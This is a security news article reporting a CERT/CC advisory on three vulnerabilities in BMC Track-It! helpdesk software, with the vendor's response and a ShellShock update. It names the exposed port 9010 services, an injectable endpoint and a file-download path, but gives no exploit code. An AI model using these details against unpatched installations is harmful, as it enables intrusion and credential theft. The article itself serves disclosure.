Track-It!, the IT helpdesk solution developed by business service management software company BMC Software, is plagued by several vulnerabilities, the CERT Coordination Center at Carnegie Mellon University (CERT/CC) warned this week.
A total of three flaws were identified by Pedro Ribeiro of Agile Information Security in BMC Track-It! version 11.3.0.355.
One of the vulnerabilities has been cataloged as “missing authentication for critical function” and has been assigned the CVE identifier CVE-2014-4872. The flaw can be exploited by a remote unauthenticated attacker to upload and download files, and execute arbitrary code.
“BMC Track-It! exposes several dangerous remote .NET services on port 9010 without authentication. .NET remoting allows a user to invoke methods remotely and retrieve their result. The exposed service FileStorageService allows for arbitrary file upload and code execution. The exposed service ConfigurationService allows for retrieval of configuration files which contain both application and domain credentials,” CERT/CC wrote in its advisory.
The second vulnerability, CVE-2014-4873, can be exploited by an authenticated user for blind SQL injection by entering comparison operators in the POST string for the /TrackItWeb/Grid/GetData page.
The third issue, CVE-2014-4874, is related to permissions, privileges and access control, and it can allow a remote authenticated attacker to download arbitrary files on the /TrackItWeb/Attachment page.
CERT/CC is unaware of a practical solution to the problem. Using a firewall to block inbound requests to port 9010 prevents access to the vulnerable methods, but it could interfere with the normal operation of the software, the organization explained.
“BMC takes application security seriously. We have a dedicated product application security team which monitors incoming alerts sent to our [email protected] alias, as well as all AppSec related issues reported by customers through our support team, via Twitter or directly from Application Security researchers. We work hard to respond to these alerts and repair all CVSS critical or high vulnerabilities found in any of our products,” BMC Software representatives told SecurityWeek.
In this particular case, the company says it’s aware of the vulnerabilities and its AppSec team has been working on addressing them. BMC Software also noted that it has contacted Pedro Ribeiro regarding his findings, and is in contact with all appropriate organizations and users of the product.
“We will issue support alerts to affected customers and relevant organizations,” the company said.
In late September, BMC Software informed customers that it had been investigating and assessing the impact of the GNU Bash vulnerability dubbed “ShellShock” on the company’s products and services.
The list of affected products and services includes ADDM, BMC Remedy OnDemand, CLM Rapid Deployment Stack, BMC Middleware and Transaction Management, BMC Application Management Console, BMC Real End User Experience Hardware collector (1200 series), BMC Real End User Experience Monitoring, BMC TrueSight End User Collector (4200 Series), and BMC TrueSight End User Monitor (all series).
A fix has already been made available for ADDM, and perimeter systems have been updated to minimize exposure from the Web in the case of BMC Remedy OnDemand. As for the other products, patches are expected to become available later this month, the company said.
